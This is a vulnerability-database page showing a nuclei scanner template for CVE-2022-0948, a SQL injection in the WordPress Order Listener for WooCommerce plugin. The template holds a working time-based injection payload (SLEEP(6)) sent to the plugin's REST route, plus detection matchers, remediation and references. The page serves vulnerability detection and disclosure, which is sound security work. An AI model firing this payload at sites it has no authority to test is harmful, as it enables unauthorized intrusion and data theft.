Lucene search
K

WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 56 Views

WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection. SQL injection vulnerability in WordPress Order Listener for WooCommerce plugin before 3.2.2 allows arbitrary SQL queries leading to unauthorized access and data leakage

Related
Refs
Code
id: CVE-2022-0948

info:
  name: WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Order Listener for WooCommerce plugin before 3.2.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape the id parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Update the WordPress Order Listener for WooCommerce plugin to version 3.2.2 or later.
  reference:
    - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
    - https://wordpress.org/plugins/woc-order-alert/
    - https://plugins.trac.wordpress.org/changeset/2707223
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0948
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0948
    cwe-id: CWE-89
    epss-score: 0.6883
    epss-percentile: 0.98643
    cpe: cpe:2.3:a:pluginbazaar:order_listener_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pluginbazaar
    product: order_listener_for_woocommerce
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wp,unauth,sqli,woc-order-alert,wpscan,wordpress,wp-plugin,pluginbazaar,vuln,vkev

http:
  - raw:
      - |
        @timeout: 15s
        POST /?rest_route=/olistener/new HTTP/1.1
        Host: {{Hostname}}
        content-type: application/json

        {"id":" (SLEEP(6))#"}
      - |
        GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code_1 == 200'
          - 'contains(content_type_1, "application/json")'
          - 'contains(body_2, "olistener-action.olistener-controller")'
        condition: and
# digest: 4a0a004730450221008faa62d0d7b4e67d51ff6f2c38cf2735c4ff302f0c14614e92f60ff7a82ca2b00220126aa84e0454073334b1df3081864c72326cc897742a5566ced57fb4a91b1a98:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.6883
56